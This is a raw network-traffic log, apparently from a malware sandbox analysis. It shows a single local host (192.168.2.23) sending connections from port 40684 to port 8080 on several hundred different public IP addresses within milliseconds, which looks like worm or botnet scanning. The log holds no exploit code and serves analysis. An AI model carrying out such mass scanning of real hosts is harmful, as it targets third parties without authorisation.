                                                            Feb 14, 2024 09:27:43.007788897 CET406848080192.168.2.2385.210.155.149
                                                            Feb 14, 2024 09:27:43.007788897 CET406848080192.168.2.2362.127.174.20
                                                            Feb 14, 2024 09:27:43.007805109 CET406848080192.168.2.2385.176.44.10
                                                            Feb 14, 2024 09:27:43.007805109 CET406848080192.168.2.2362.40.215.159
                                                            Feb 14, 2024 09:27:43.007805109 CET406848080192.168.2.2395.112.22.67
                                                            Feb 14, 2024 09:27:43.007805109 CET406848080192.168.2.2331.169.79.154
                                                            Feb 14, 2024 09:27:43.007816076 CET406848080192.168.2.2331.30.12.155
                                                            Feb 14, 2024 09:27:43.007817030 CET406848080192.168.2.2331.139.198.125
                                                            Feb 14, 2024 09:27:43.007827044 CET406848080192.168.2.2331.170.198.106
                                                            Feb 14, 2024 09:27:43.007827044 CET406848080192.168.2.2331.158.16.146
                                                            Feb 14, 2024 09:27:43.007832050 CET406848080192.168.2.2394.145.198.129
                                                            Feb 14, 2024 09:27:43.007836103 CET406848080192.168.2.2395.3.193.81
                                                            Feb 14, 2024 09:27:43.007836103 CET406848080192.168.2.2395.171.219.78
                                                            Feb 14, 2024 09:27:43.007837057 CET406848080192.168.2.2385.91.159.56
                                                            Feb 14, 2024 09:27:43.007843018 CET406848080192.168.2.2394.35.52.5
                                                            Feb 14, 2024 09:27:43.007868052 CET406848080192.168.2.2394.153.113.101
                                                            Feb 14, 2024 09:27:43.007869005 CET406848080192.168.2.2362.70.108.131
                                                            Feb 14, 2024 09:27:43.007872105 CET406848080192.168.2.2394.174.3.147
                                                            Feb 14, 2024 09:27:43.007879972 CET406848080192.168.2.2385.252.210.83
                                                            Feb 14, 2024 09:27:43.007882118 CET406848080192.168.2.2331.87.18.22
                                                            Feb 14, 2024 09:27:43.007883072 CET406848080192.168.2.2362.98.198.85
                                                            Feb 14, 2024 09:27:43.007895947 CET406848080192.168.2.2385.24.127.126
                                                            Feb 14, 2024 09:27:43.007895947 CET406848080192.168.2.2331.95.63.191
                                                            Feb 14, 2024 09:27:43.007905960 CET406848080192.168.2.2395.250.246.252
                                                            Feb 14, 2024 09:27:43.007909060 CET406848080192.168.2.2385.100.250.42
                                                            Feb 14, 2024 09:27:43.007920027 CET406848080192.168.2.2395.161.52.1
                                                            Feb 14, 2024 09:27:43.007926941 CET406848080192.168.2.2385.165.202.123
                                                            Feb 14, 2024 09:27:43.007937908 CET406848080192.168.2.2385.106.125.109
                                                            Feb 14, 2024 09:27:43.007937908 CET406848080192.168.2.2395.210.143.179
                                                            Feb 14, 2024 09:27:43.007937908 CET406848080192.168.2.2362.47.119.196
                                                            Feb 14, 2024 09:27:43.007956028 CET406848080192.168.2.2395.143.255.10
                                                            Feb 14, 2024 09:27:43.007956028 CET406848080192.168.2.2362.80.32.68
                                                            Feb 14, 2024 09:27:43.007962942 CET406848080192.168.2.2394.19.131.176
                                                            Feb 14, 2024 09:27:43.007967949 CET406848080192.168.2.2385.63.230.172
                                                            Feb 14, 2024 09:27:43.007972002 CET406848080192.168.2.2385.65.45.5
                                                            Feb 14, 2024 09:27:43.007987022 CET406848080192.168.2.2385.174.56.94
                                                            Feb 14, 2024 09:27:43.007987022 CET406848080192.168.2.2362.211.22.91
                                                            Feb 14, 2024 09:27:43.007991076 CET406848080192.168.2.2362.210.27.237
                                                            Feb 14, 2024 09:27:43.007997036 CET406848080192.168.2.2385.146.123.229
                                                            Feb 14, 2024 09:27:43.008006096 CET406848080192.168.2.2362.38.29.36
                                                            Feb 14, 2024 09:27:43.008011103 CET406848080192.168.2.2385.201.210.202
                                                            Feb 14, 2024 09:27:43.008013964 CET406848080192.168.2.2395.248.123.124
                                                            Feb 14, 2024 09:27:43.008024931 CET406848080192.168.2.2394.132.149.11
                                                            Feb 14, 2024 09:27:43.008027077 CET406848080192.168.2.2385.61.208.207
                                                            Feb 14, 2024 09:27:43.008035898 CET406848080192.168.2.2385.69.14.170
                                                            Feb 14, 2024 09:27:43.008037090 CET406848080192.168.2.2394.104.79.196
                                                            Feb 14, 2024 09:27:43.008049011 CET406848080192.168.2.2394.117.120.97
                                                            Feb 14, 2024 09:27:43.008055925 CET406848080192.168.2.2394.222.157.210
                                                            Feb 14, 2024 09:27:43.008055925 CET406848080192.168.2.2394.249.144.45
                                                            Feb 14, 2024 09:27:43.008055925 CET406848080192.168.2.2362.193.103.217
                                                            Feb 14, 2024 09:27:43.008065939 CET406848080192.168.2.2362.233.70.255
                                                            Feb 14, 2024 09:27:43.008069038 CET406848080192.168.2.2394.186.157.82
                                                            Feb 14, 2024 09:27:43.008080006 CET406848080192.168.2.2331.243.10.65
                                                            Feb 14, 2024 09:27:43.008081913 CET406848080192.168.2.2395.45.99.213
                                                            Feb 14, 2024 09:27:43.008095026 CET406848080192.168.2.2395.20.236.8
                                                            Feb 14, 2024 09:27:43.008099079 CET406848080192.168.2.2385.38.161.77
                                                            Feb 14, 2024 09:27:43.008104086 CET406848080192.168.2.2385.218.165.176
                                                            Feb 14, 2024 09:27:43.008116961 CET406848080192.168.2.2395.188.14.38
                                                            Feb 14, 2024 09:27:43.008127928 CET406848080192.168.2.2395.247.57.151
                                                            Feb 14, 2024 09:27:43.008135080 CET406848080192.168.2.2385.227.221.50
                                                            Feb 14, 2024 09:27:43.008136988 CET406848080192.168.2.2385.215.76.213
                                                            Feb 14, 2024 09:27:43.008147001 CET406848080192.168.2.2385.184.207.99
                                                            Feb 14, 2024 09:27:43.008156061 CET406848080192.168.2.2362.114.196.251
                                                            Feb 14, 2024 09:27:43.008164883 CET406848080192.168.2.2331.50.180.83
                                                            Feb 14, 2024 09:27:43.008167028 CET406848080192.168.2.2394.149.23.169
                                                            Feb 14, 2024 09:27:43.008167982 CET406848080192.168.2.2331.70.200.36
                                                            Feb 14, 2024 09:27:43.008182049 CET406848080192.168.2.2362.179.127.147
                                                            Feb 14, 2024 09:27:43.008183002 CET406848080192.168.2.2331.133.76.214
                                                            Feb 14, 2024 09:27:43.008187056 CET406848080192.168.2.2385.163.112.139
                                                            Feb 14, 2024 09:27:43.008198023 CET406848080192.168.2.2331.30.191.53
                                                            Feb 14, 2024 09:27:43.008200884 CET406848080192.168.2.2394.128.77.208
                                                            Feb 14, 2024 09:27:43.008225918 CET406848080192.168.2.2385.134.42.72
                                                            Feb 14, 2024 09:27:43.008225918 CET406848080192.168.2.2394.235.78.178
                                                            Feb 14, 2024 09:27:43.008235931 CET406848080192.168.2.2394.132.234.187
                                                            Feb 14, 2024 09:27:43.008238077 CET406848080192.168.2.2331.94.203.170
                                                            Feb 14, 2024 09:27:43.008239031 CET406848080192.168.2.2331.169.25.68
                                                            Feb 14, 2024 09:27:43.008236885 CET406848080192.168.2.2331.105.227.11
                                                            Feb 14, 2024 09:27:43.008236885 CET406848080192.168.2.2362.132.29.124
                                                            Feb 14, 2024 09:27:43.008240938 CET406848080192.168.2.2362.238.215.36
                                                            Feb 14, 2024 09:27:43.008241892 CET406848080192.168.2.2394.5.124.164
                                                            Feb 14, 2024 09:27:43.008241892 CET406848080192.168.2.2395.182.187.56
                                                            Feb 14, 2024 09:27:43.008246899 CET406848080192.168.2.2331.201.52.38
                                                            Feb 14, 2024 09:27:43.008250952 CET406848080192.168.2.2395.48.224.164
                                                            Feb 14, 2024 09:27:43.008250952 CET406848080192.168.2.2394.41.254.19
                                                            Feb 14, 2024 09:27:43.008260965 CET406848080192.168.2.2331.28.39.21
                                                            Feb 14, 2024 09:27:43.008264065 CET406848080192.168.2.2395.37.36.67
                                                            Feb 14, 2024 09:27:43.008270979 CET406848080192.168.2.2331.131.186.204
                                                            Feb 14, 2024 09:27:43.008274078 CET406848080192.168.2.2385.57.127.184
                                                            Feb 14, 2024 09:27:43.008286953 CET406848080192.168.2.2362.190.130.150
                                                            Feb 14, 2024 09:27:43.008291006 CET406848080192.168.2.2395.58.146.2
                                                            Feb 14, 2024 09:27:43.008292913 CET406848080192.168.2.2395.239.69.94
                                                            Feb 14, 2024 09:27:43.008299112 CET406848080192.168.2.2394.247.205.27
                                                            Feb 14, 2024 09:27:43.008310080 CET406848080192.168.2.2385.23.115.49
                                                            Feb 14, 2024 09:27:43.008311033 CET406848080192.168.2.2385.169.85.2
                                                            Feb 14, 2024 09:27:43.008321047 CET406848080192.168.2.2331.50.230.253
                                                            Feb 14, 2024 09:27:43.008322954 CET406848080192.168.2.2385.102.202.35
                                                            Feb 14, 2024 09:27:43.008331060 CET406848080192.168.2.2331.40.54.182
                                                            Feb 14, 2024 09:27:43.008339882 CET406848080192.168.2.2394.199.193.159
                                                            Feb 14, 2024 09:27:43.008351088 CET406848080192.168.2.2362.96.126.151
                                                            Feb 14, 2024 09:27:43.008358955 CET406848080192.168.2.2395.32.28.154
                                                            Feb 14, 2024 09:27:43.008366108 CET406848080192.168.2.2395.0.155.107
                                                            Feb 14, 2024 09:27:43.008368015 CET406848080192.168.2.2331.45.65.19
                                                            Feb 14, 2024 09:27:43.008373976 CET406848080192.168.2.2394.147.252.48
                                                            Feb 14, 2024 09:27:43.008377075 CET406848080192.168.2.2385.37.222.233
                                                            Feb 14, 2024 09:27:43.008383036 CET406848080192.168.2.2394.70.205.190
                                                            Feb 14, 2024 09:27:43.008385897 CET406848080192.168.2.2331.44.187.207
                                                            Feb 14, 2024 09:27:43.008402109 CET406848080192.168.2.2362.62.161.82
                                                            Feb 14, 2024 09:27:43.008419991 CET406848080192.168.2.2395.21.129.58
                                                            Feb 14, 2024 09:27:43.008424044 CET406848080192.168.2.2331.24.117.2
                                                            Feb 14, 2024 09:27:43.008421898 CET406848080192.168.2.2331.100.116.36
                                                            Feb 14, 2024 09:27:43.008428097 CET406848080192.168.2.2395.206.138.29
                                                            Feb 14, 2024 09:27:43.008433104 CET406848080192.168.2.2395.93.148.200
                                                            Feb 14, 2024 09:27:43.008435965 CET406848080192.168.2.2331.51.200.76
                                                            Feb 14, 2024 09:27:43.008445024 CET406848080192.168.2.2395.158.189.138
                                                            Feb 14, 2024 09:27:43.008452892 CET406848080192.168.2.2395.43.247.84
                                                            Feb 14, 2024 09:27:43.008455992 CET406848080192.168.2.2362.27.229.34
                                                            Feb 14, 2024 09:27:43.008465052 CET406848080192.168.2.2362.70.22.230
                                                            Feb 14, 2024 09:27:43.008471012 CET406848080192.168.2.2362.235.153.15
                                                            Feb 14, 2024 09:27:43.008471966 CET406848080192.168.2.2394.142.65.141
                                                            Feb 14, 2024 09:27:43.008482933 CET406848080192.168.2.2385.180.132.59
                                                            Feb 14, 2024 09:27:43.008491993 CET406848080192.168.2.2362.132.205.190
                                                            Feb 14, 2024 09:27:43.008502960 CET406848080192.168.2.2362.90.93.149
                                                            Feb 14, 2024 09:27:43.008503914 CET406848080192.168.2.2385.164.103.161
                                                            Feb 14, 2024 09:27:43.008517027 CET406848080192.168.2.2385.132.197.144
                                                            Feb 14, 2024 09:27:43.008517027 CET406848080192.168.2.2394.59.246.188
                                                            Feb 14, 2024 09:27:43.008521080 CET406848080192.168.2.2394.59.191.15
                                                            Feb 14, 2024 09:27:43.008521080 CET406848080192.168.2.2385.206.54.11
                                                            Feb 14, 2024 09:27:43.008526087 CET406848080192.168.2.2385.138.63.214
                                                            Feb 14, 2024 09:27:43.008533001 CET406848080192.168.2.2362.157.150.138
                                                            Feb 14, 2024 09:27:43.008539915 CET406848080192.168.2.2395.190.129.219
                                                            Feb 14, 2024 09:27:43.008548975 CET406848080192.168.2.2331.170.77.183
                                                            Feb 14, 2024 09:27:43.008548975 CET406848080192.168.2.2385.209.121.76
                                                            Feb 14, 2024 09:27:43.008558989 CET406848080192.168.2.2362.8.204.88
                                                            Feb 14, 2024 09:27:43.008563995 CET406848080192.168.2.2394.17.200.170
                                                            Feb 14, 2024 09:27:43.008574963 CET406848080192.168.2.2395.65.20.5
                                                            Feb 14, 2024 09:27:43.008586884 CET406848080192.168.2.2385.219.164.112
                                                            Feb 14, 2024 09:27:43.008589029 CET406848080192.168.2.2331.69.127.121
                                                            Feb 14, 2024 09:27:43.008590937 CET406848080192.168.2.2385.207.152.126
                                                            Feb 14, 2024 09:27:43.008599997 CET406848080192.168.2.2331.97.233.179
                                                            Feb 14, 2024 09:27:43.008604050 CET406848080192.168.2.2362.240.242.129
                                                            Feb 14, 2024 09:27:43.008613110 CET406848080192.168.2.2385.120.0.59
                                                            Feb 14, 2024 09:27:43.008625984 CET406848080192.168.2.2394.157.204.24
                                                            Feb 14, 2024 09:27:43.008630037 CET406848080192.168.2.2385.167.160.40
                                                            Feb 14, 2024 09:27:43.008635998 CET406848080192.168.2.2395.53.203.19
                                                            Feb 14, 2024 09:27:43.008650064 CET406848080192.168.2.2395.32.221.232
                                                            Feb 14, 2024 09:27:43.008656025 CET406848080192.168.2.2395.21.31.77
                                                            Feb 14, 2024 09:27:43.008656025 CET406848080192.168.2.2385.251.214.205
                                                            Feb 14, 2024 09:27:43.008671045 CET406848080192.168.2.2362.138.9.251
                                                            Feb 14, 2024 09:27:43.008672953 CET406848080192.168.2.2362.155.214.10
                                                            Feb 14, 2024 09:27:43.008672953 CET406848080192.168.2.2394.214.42.178
                                                            Feb 14, 2024 09:27:43.008685112 CET406848080192.168.2.2385.82.240.11
                                                            Feb 14, 2024 09:27:43.008687019 CET406848080192.168.2.2394.239.92.114
                                                            Feb 14, 2024 09:27:43.008697987 CET406848080192.168.2.2362.136.161.109
                                                            Feb 14, 2024 09:27:43.008716106 CET406848080192.168.2.2362.30.96.16
                                                            Feb 14, 2024 09:27:43.008716106 CET406848080192.168.2.2385.30.176.234
                                                            Feb 14, 2024 09:27:43.008724928 CET406848080192.168.2.2362.208.82.37
                                                            Feb 14, 2024 09:27:43.008737087 CET406848080192.168.2.2331.174.183.119
                                                            Feb 14, 2024 09:27:43.008738995 CET406848080192.168.2.2394.254.166.74
                                                            Feb 14, 2024 09:27:43.008749008 CET406848080192.168.2.2362.55.89.87
                                                            Feb 14, 2024 09:27:43.008752108 CET406848080192.168.2.2385.245.108.229
                                                            Feb 14, 2024 09:27:43.008760929 CET406848080192.168.2.2395.68.144.117
                                                            Feb 14, 2024 09:27:43.008779049 CET406848080192.168.2.2394.137.233.118
                                                            Feb 14, 2024 09:27:43.008779049 CET406848080192.168.2.2394.213.195.215
                                                            Feb 14, 2024 09:27:43.008785009 CET406848080192.168.2.2331.74.95.76
                                                            Feb 14, 2024 09:27:43.008789062 CET406848080192.168.2.2394.4.158.226
                                                            Feb 14, 2024 09:27:43.008789062 CET406848080192.168.2.2394.224.205.204
                                                            Feb 14, 2024 09:27:43.008789062 CET406848080192.168.2.2395.181.181.29
                                                            Feb 14, 2024 09:27:43.008789062 CET406848080192.168.2.2395.55.147.241
                                                            Feb 14, 2024 09:27:43.008791924 CET406848080192.168.2.2394.10.42.236
                                                            Feb 14, 2024 09:27:43.008809090 CET406848080192.168.2.2394.33.28.147
                                                            Feb 14, 2024 09:27:43.008809090 CET406848080192.168.2.2362.57.181.101
                                                            Feb 14, 2024 09:27:43.008816957 CET406848080192.168.2.2362.109.150.157
                                                            Feb 14, 2024 09:27:43.008831024 CET406848080192.168.2.2331.153.70.58
                                                            Feb 14, 2024 09:27:43.008832932 CET406848080192.168.2.2395.104.198.13
                                                            Feb 14, 2024 09:27:43.008832932 CET406848080192.168.2.2385.149.103.245
                                                            Feb 14, 2024 09:27:43.008843899 CET406848080192.168.2.2394.158.71.145
                                                            Feb 14, 2024 09:27:43.008846045 CET406848080192.168.2.2395.187.135.113
                                                            Feb 14, 2024 09:27:43.008847952 CET406848080192.168.2.2394.179.218.173
                                                            Feb 14, 2024 09:27:43.008857965 CET406848080192.168.2.2395.130.139.126
                                                            Feb 14, 2024 09:27:43.008866072 CET406848080192.168.2.2362.109.118.201
                                                            Feb 14, 2024 09:27:43.008877039 CET406848080192.168.2.2394.87.195.108
                                                            Feb 14, 2024 09:27:43.008877039 CET406848080192.168.2.2395.57.113.174
                                                            Feb 14, 2024 09:27:43.008886099 CET406848080192.168.2.2394.60.110.185
                                                            Feb 14, 2024 09:27:43.008894920 CET406848080192.168.2.2362.21.169.187
                                                            Feb 14, 2024 09:27:43.008894920 CET406848080192.168.2.2362.118.108.91
                                                            Feb 14, 2024 09:27:43.008908033 CET406848080192.168.2.2394.188.71.91
                                                            Feb 14, 2024 09:27:43.008908033 CET406848080192.168.2.2385.145.1.66
                                                            Feb 14, 2024 09:27:43.008919954 CET406848080192.168.2.2362.129.214.74
                                                            Feb 14, 2024 09:27:43.008919954 CET406848080192.168.2.2362.114.80.107
                                                            Feb 14, 2024 09:27:43.008939981 CET406848080192.168.2.2394.122.251.111
                                                            Feb 14, 2024 09:27:43.008940935 CET406848080192.168.2.2331.6.29.78
                                                            Feb 14, 2024 09:27:43.008944035 CET406848080192.168.2.2394.239.227.0
                                                            Feb 14, 2024 09:27:43.008944035 CET406848080192.168.2.2395.72.75.48
                                                            Feb 14, 2024 09:27:43.008944035 CET406848080192.168.2.2395.250.48.192
                                                            Feb 14, 2024 09:27:43.008965969 CET406848080192.168.2.2362.26.167.127
                                                            Feb 14, 2024 09:27:43.008966923 CET406848080192.168.2.2362.177.168.210
                                                            Feb 14, 2024 09:27:43.008966923 CET406848080192.168.2.2394.58.31.164
                                                            Feb 14, 2024 09:27:43.008975983 CET406848080192.168.2.2385.85.36.0
                                                            Feb 14, 2024 09:27:43.008984089 CET406848080192.168.2.2362.219.98.113
                                                            Feb 14, 2024 09:27:43.009002924 CET406848080192.168.2.2385.56.129.106
                                                            Feb 14, 2024 09:27:43.009004116 CET406848080192.168.2.2331.198.83.152
                                                            Feb 14, 2024 09:27:43.009006023 CET406848080192.168.2.2394.156.193.152
                                                            Feb 14, 2024 09:27:43.009011030 CET406848080192.168.2.2385.210.245.45
                                                            Feb 14, 2024 09:27:43.009011984 CET406848080192.168.2.2385.169.76.118
                                                            Feb 14, 2024 09:27:43.009011984 CET406848080192.168.2.2362.138.248.207
                                                            Feb 14, 2024 09:27:43.009011984 CET406848080192.168.2.2385.119.11.78
                                                            Feb 14, 2024 09:27:43.009020090 CET406848080192.168.2.2395.79.141.14
                                                            Feb 14, 2024 09:27:43.009035110 CET406848080192.168.2.2331.241.160.25
                                                            Feb 14, 2024 09:27:43.009038925 CET406848080192.168.2.2362.60.182.179
                                                            Feb 14, 2024 09:27:43.009038925 CET406848080192.168.2.2394.63.252.233
                                                            Feb 14, 2024 09:27:43.009041071 CET406848080192.168.2.2395.147.187.216
                                                            Feb 14, 2024 09:27:43.009041071 CET406848080192.168.2.2331.192.42.70
                                                            Feb 14, 2024 09:27:43.009067059 CET406848080192.168.2.2362.122.169.154
                                                            Feb 14, 2024 09:27:43.009072065 CET406848080192.168.2.2394.24.93.144
                                                            Feb 14, 2024 09:27:43.009073019 CET406848080192.168.2.2362.100.13.40
                                                            Feb 14, 2024 09:27:43.009073973 CET406848080192.168.2.2385.200.201.201
                                                            Feb 14, 2024 09:27:43.009079933 CET406848080192.168.2.2394.217.9.63
                                                            Feb 14, 2024 09:27:43.009079933 CET406848080192.168.2.2395.130.181.132
                                                            Feb 14, 2024 09:27:43.009082079 CET406848080192.168.2.2394.90.178.17
                                                            Feb 14, 2024 09:27:43.009083033 CET406848080192.168.2.2395.163.176.64
                                                            Feb 14, 2024 09:27:43.009083033 CET406848080192.168.2.2385.14.184.94
                                                            Feb 14, 2024 09:27:43.009083986 CET406848080192.168.2.2362.193.82.109
                                                            Feb 14, 2024 09:27:43.009083986 CET406848080192.168.2.2362.34.55.248
                                                            Feb 14, 2024 09:27:43.009088039 CET406848080192.168.2.2394.36.190.74
                                                            Feb 14, 2024 09:27:43.009088039 CET406848080192.168.2.2331.135.43.82
                                                            Feb 14, 2024 09:27:43.009088039 CET406848080192.168.2.2362.113.110.227
                                                            Feb 14, 2024 09:27:43.009090900 CET406848080192.168.2.2385.227.14.88
                                                            Feb 14, 2024 09:27:43.009094954 CET406848080192.168.2.2394.248.226.245
                                                            Feb 14, 2024 09:27:43.009104967 CET406848080192.168.2.2394.242.120.251
                                                            Feb 14, 2024 09:27:43.009104967 CET406848080192.168.2.2395.230.161.9
                                                            Feb 14, 2024 09:27:43.009114981 CET406848080192.168.2.2385.77.32.173
                                                            Feb 14, 2024 09:27:43.009115934 CET406848080192.168.2.2362.157.46.89
                                                            Feb 14, 2024 09:27:43.009126902 CET406848080192.168.2.2394.120.32.220
                                                            Feb 14, 2024 09:27:43.009136915 CET406848080192.168.2.2394.216.42.80
                                                            Feb 14, 2024 09:27:43.009140015 CET406848080192.168.2.2385.248.67.243
                                                            Feb 14, 2024 09:27:43.009155989 CET406848080192.168.2.2385.3.13.136
                                                            Feb 14, 2024 09:27:43.009157896 CET406848080192.168.2.2362.92.202.224
                                                            Feb 14, 2024 09:27:43.009164095 CET406848080192.168.2.2331.94.9.120
                                                            Feb 14, 2024 09:27:43.009174109 CET406848080192.168.2.2385.105.46.136
                                                            Feb 14, 2024 09:27:43.009180069 CET406848080192.168.2.2395.79.123.209
                                                            Feb 14, 2024 09:27:43.009193897 CET406848080192.168.2.2385.182.201.164
                                                            Feb 14, 2024 09:27:43.009193897 CET406848080192.168.2.2394.69.154.138
                                                            Feb 14, 2024 09:27:43.009198904 CET406848080192.168.2.2362.39.209.106
                                                            Feb 14, 2024 09:27:43.009211063 CET406848080192.168.2.2394.46.139.28
                                                            Feb 14, 2024 09:27:43.009212971 CET406848080192.168.2.2362.147.235.75
                                                            Feb 14, 2024 09:27:43.009221077 CET406848080192.168.2.2394.43.180.204
                                                            Feb 14, 2024 09:27:43.009221077 CET406848080192.168.2.2385.82.157.137
                                                            Feb 14, 2024 09:27:43.009223938 CET406848080192.168.2.2395.161.3.59
                                                            Feb 14, 2024 09:27:43.009232998 CET406848080192.168.2.2331.189.29.226
                                                            Feb 14, 2024 09:27:43.009243965 CET406848080192.168.2.2395.122.46.19
                                                            Feb 14, 2024 09:27:43.009243965 CET406848080192.168.2.2362.177.218.23
                                                            Feb 14, 2024 09:27:43.009257078 CET406848080192.168.2.2395.217.65.175
                                                            Feb 14, 2024 09:27:43.009265900 CET406848080192.168.2.2394.248.35.109
                                                            Feb 14, 2024 09:27:43.009278059 CET406848080192.168.2.2395.33.238.117
                                                            Feb 14, 2024 09:27:43.009284973 CET406848080192.168.2.2385.68.50.199
                                                            Feb 14, 2024 09:27:43.009284973 CET406848080192.168.2.2394.102.107.34
                                                            Feb 14, 2024 09:27:43.009284973 CET406848080192.168.2.2362.243.234.206
                                                            Feb 14, 2024 09:27:43.009299994 CET406848080192.168.2.2331.152.106.46
                                                            Feb 14, 2024 09:27:43.009299994 CET406848080192.168.2.2331.18.37.33
                                                            Feb 14, 2024 09:27:43.009305954 CET406848080192.168.2.2395.167.55.142
                                                            Feb 14, 2024 09:27:43.009308100 CET406848080192.168.2.2394.23.216.197
                                                            Feb 14, 2024 09:27:43.009318113 CET406848080192.168.2.2395.77.46.57
                                                            Feb 14, 2024 09:27:43.009326935 CET406848080192.168.2.2385.108.2.60
                                                            Feb 14, 2024 09:27:43.009337902 CET406848080192.168.2.2395.108.243.81
                                                            Feb 14, 2024 09:27:43.009337902 CET406848080192.168.2.2331.176.46.0
                                                            Feb 14, 2024 09:27:43.009346008 CET406848080192.168.2.2395.247.232.0
                                                            Feb 14, 2024 09:27:43.009355068 CET406848080192.168.2.2385.122.239.66
                                                            Feb 14, 2024 09:27:43.009362936 CET406848080192.168.2.2331.161.54.196
                                                            Feb 14, 2024 09:27:43.009363890 CET406848080192.168.2.2331.180.89.199
                                                            Feb 14, 2024 09:27:43.009373903 CET406848080192.168.2.2394.117.164.27
                                                            Feb 14, 2024 09:27:43.009383917 CET406848080192.168.2.2394.2.255.2
                                                            Feb 14, 2024 09:27:43.009386063 CET406848080192.168.2.2395.17.209.150
                                                            Feb 14, 2024 09:27:43.009388924 CET406848080192.168.2.2331.54.224.131
                                                            Feb 14, 2024 09:27:43.009391069 CET406848080192.168.2.2385.247.44.185
                                                            Feb 14, 2024 09:27:43.009397030 CET406848080192.168.2.2394.104.194.118
                                                            Feb 14, 2024 09:27:43.009397984 CET406848080192.168.2.2362.170.76.227
                                                            Feb 14, 2024 09:27:43.009407997 CET406848080192.168.2.2362.57.233.176
                                                            Feb 14, 2024 09:27:43.009409904 CET406848080192.168.2.2331.55.70.207
                                                            Feb 14, 2024 09:27:43.009414911 CET406848080192.168.2.2394.27.84.30
                                                            Feb 14, 2024 09:27:43.009418964 CET406848080192.168.2.2362.125.213.232
                                                            Feb 14, 2024 09:27:43.009424925 CET406848080192.168.2.2362.64.251.224
                                                            Feb 14, 2024 09:27:43.009433031 CET406848080192.168.2.2395.129.14.9
                                                            Feb 14, 2024 09:27:43.009435892 CET406848080192.168.2.2385.250.48.2
                                                            Feb 14, 2024 09:27:43.009442091 CET406848080192.168.2.2362.25.54.175
                                                            Feb 14, 2024 09:27:43.009452105 CET406848080192.168.2.2331.80.98.168
                                                            Feb 14, 2024 09:27:43.009454966 CET406848080192.168.2.2362.25.86.31
                                                            Feb 14, 2024 09:27:43.009465933 CET406848080192.168.2.2395.63.152.46
                                                            Feb 14, 2024 09:27:43.009473085 CET406848080192.168.2.2394.245.221.123
                                                            Feb 14, 2024 09:27:43.009475946 CET406848080192.168.2.2395.150.205.16
                                                            Feb 14, 2024 09:27:43.009489059 CET406848080192.168.2.2331.218.164.108
                                                            Feb 14, 2024 09:27:43.009493113 CET406848080192.168.2.2385.131.248.204
                                                            Feb 14, 2024 09:27:43.009501934 CET406848080192.168.2.2394.223.254.123
                                                            Feb 14, 2024 09:27:43.009510994 CET406848080192.168.2.2362.186.96.58
                                                            Feb 14, 2024 09:27:43.009512901 CET406848080192.168.2.2394.57.98.214
                                                            Feb 14, 2024 09:27:43.009529114 CET406848080192.168.2.2395.253.146.146
                                                            Feb 14, 2024 09:27:43.009531975 CET406848080192.168.2.2362.40.85.232
                                                            Feb 14, 2024 09:27:43.009541035 CET406848080192.168.2.2362.77.75.95
                                                            Feb 14, 2024 09:27:43.009545088 CET406848080192.168.2.2331.213.68.226
                                                            Feb 14, 2024 09:27:43.009547949 CET406848080192.168.2.2395.151.138.127
                                                            Feb 14, 2024 09:27:43.009560108 CET406848080192.168.2.2395.118.175.141
                                                            Feb 14, 2024 09:27:43.009562969 CET406848080192.168.2.2331.47.229.233
                                                            Feb 14, 2024 09:27:43.009577036 CET406848080192.168.2.2395.180.94.74
                                                            Feb 14, 2024 09:27:43.009577990 CET406848080192.168.2.2362.172.79.186
                                                            Feb 14, 2024 09:27:43.009587049 CET406848080192.168.2.2395.224.100.107
                                                            Feb 14, 2024 09:27:43.009591103 CET406848080192.168.2.2385.90.157.217
                                                            Feb 14, 2024 09:27:43.009601116 CET406848080192.168.2.2395.154.236.42
                                                            Feb 14, 2024 09:27:43.009608984 CET406848080192.168.2.2394.96.118.248
                                                            Feb 14, 2024 09:27:43.009618998 CET406848080192.168.2.2385.108.23.213
                                                            Feb 14, 2024 09:27:43.009630919 CET406848080192.168.2.2362.181.91.7
                                                            Feb 14, 2024 09:27:43.009645939 CET406848080192.168.2.2331.88.221.255
                                                            Feb 14, 2024 09:27:43.009645939 CET406848080192.168.2.2331.247.60.65
                                                            Feb 14, 2024 09:27:43.009645939 CET406848080192.168.2.2331.14.201.242
                                                            Feb 14, 2024 09:27:43.009659052 CET406848080192.168.2.2331.68.202.153
                                                            Feb 14, 2024 09:27:43.009666920 CET406848080192.168.2.2385.102.152.139
                                                            Feb 14, 2024 09:27:43.009666920 CET406848080192.168.2.2362.108.157.4
                                                            Feb 14, 2024 09:27:43.009675026 CET406848080192.168.2.2385.151.176.19
                                                            Feb 14, 2024 09:27:43.009676933 CET406848080192.168.2.2394.118.51.73
                                                            Feb 14, 2024 09:27:43.009685993 CET406848080192.168.2.2385.166.164.41
                                                            Feb 14, 2024 09:27:43.009691954 CET406848080192.168.2.2331.46.31.5
                                                            Feb 14, 2024 09:27:43.009737968 CET406848080192.168.2.2395.252.105.101
                                                            Feb 14, 2024 09:27:43.009738922 CET406848080192.168.2.2331.248.217.18
                                                            Feb 14, 2024 09:27:43.009738922 CET406848080192.168.2.2362.102.112.198
                                                            Feb 14, 2024 09:27:43.009742022 CET406848080192.168.2.2394.195.115.133
                                                            Feb 14, 2024 09:27:43.009742975 CET406848080192.168.2.2395.110.34.175
                                                            Feb 14, 2024 09:27:43.009749889 CET406848080192.168.2.2395.144.48.82
                                                            Feb 14, 2024 09:27:43.009757996 CET406848080192.168.2.2362.236.150.17
                                                            Feb 14, 2024 09:27:43.009758949 CET406848080192.168.2.2362.3.234.43
                                                            Feb 14, 2024 09:27:43.009768009 CET406848080192.168.2.2385.35.222.88
                                                            Feb 14, 2024 09:27:43.009772062 CET406848080192.168.2.2394.25.78.14
                                                            Feb 14, 2024 09:27:43.009780884 CET406848080192.168.2.2331.13.213.47
                                                            Feb 14, 2024 09:27:43.009788990 CET406848080192.168.2.2394.70.28.17
                                                            Feb 14, 2024 09:27:43.009795904 CET406848080192.168.2.2385.157.4.146
                                                            Feb 14, 2024 09:27:43.009803057 CET406848080192.168.2.2395.139.3.144
                                                            Feb 14, 2024 09:27:43.009814978 CET406848080192.168.2.2395.168.146.211
                                                            Feb 14, 2024 09:27:43.009818077 CET406848080192.168.2.2395.203.252.50
                                                            Feb 14, 2024 09:27:43.009824991 CET406848080192.168.2.2385.155.93.190
                                                            Feb 14, 2024 09:27:43.009826899 CET406848080192.168.2.2395.165.43.84
                                                            Feb 14, 2024 09:27:43.009838104 CET406848080192.168.2.2394.200.141.126
                                                            Feb 14, 2024 09:27:43.009840012 CET406848080192.168.2.2394.8.123.149
                                                            Feb 14, 2024 09:27:43.009850025 CET406848080192.168.2.2394.188.86.106
